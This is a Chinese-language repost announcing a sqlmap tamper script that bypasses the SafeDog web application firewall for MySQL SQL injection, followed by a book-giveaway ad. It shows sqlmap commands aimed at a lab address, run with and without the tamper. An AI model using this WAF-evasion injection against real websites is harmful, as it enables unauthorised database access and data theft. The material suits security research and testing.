MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog​
2022-9-2 00:3:21 Author: web安全工具库(查看原文) 阅读量:21 收藏

项目作者:Tas9er

项目地址:https://github.com/Tas9er/MySQLByPassForSafeDog

0x01 工具介绍

此Tamper仅仅适用于MySQL数据库,在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。

0x02 安装与使用

1、装网站安全狗Apache最新版

2、启用安全狗,不加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

3、启用安全狗,添加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

4、绕过POC

可以添加参数-v 3进行学习查看

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

0x03 下载地址

1、通过项目地址下载

2、关注web安全工具库公众号,后台回复:20220902

0x04 声明

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

推 荐 阅 读

加我微信:ivu123ivu,进送书活动群,不定时免费送书

《x64汇编语言:从新手到AVX专家》

从简单和基本的程序开始,一直讲到 AVX 编程。,专门针对Linux上的汇编,了解如何在Windows 上进行汇编。帮助读者快速掌握64 位汇编语言。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247504166&idx=1&sn=a436cf562998593afb328fb9b0a14950&chksm=ebb53e25dcc2b733774100bd26706e925b81a4e1aec7b0cd1771a9d3bc504ab2524ce51b6d95#rd
如有侵权请联系:admin#unsafe.sh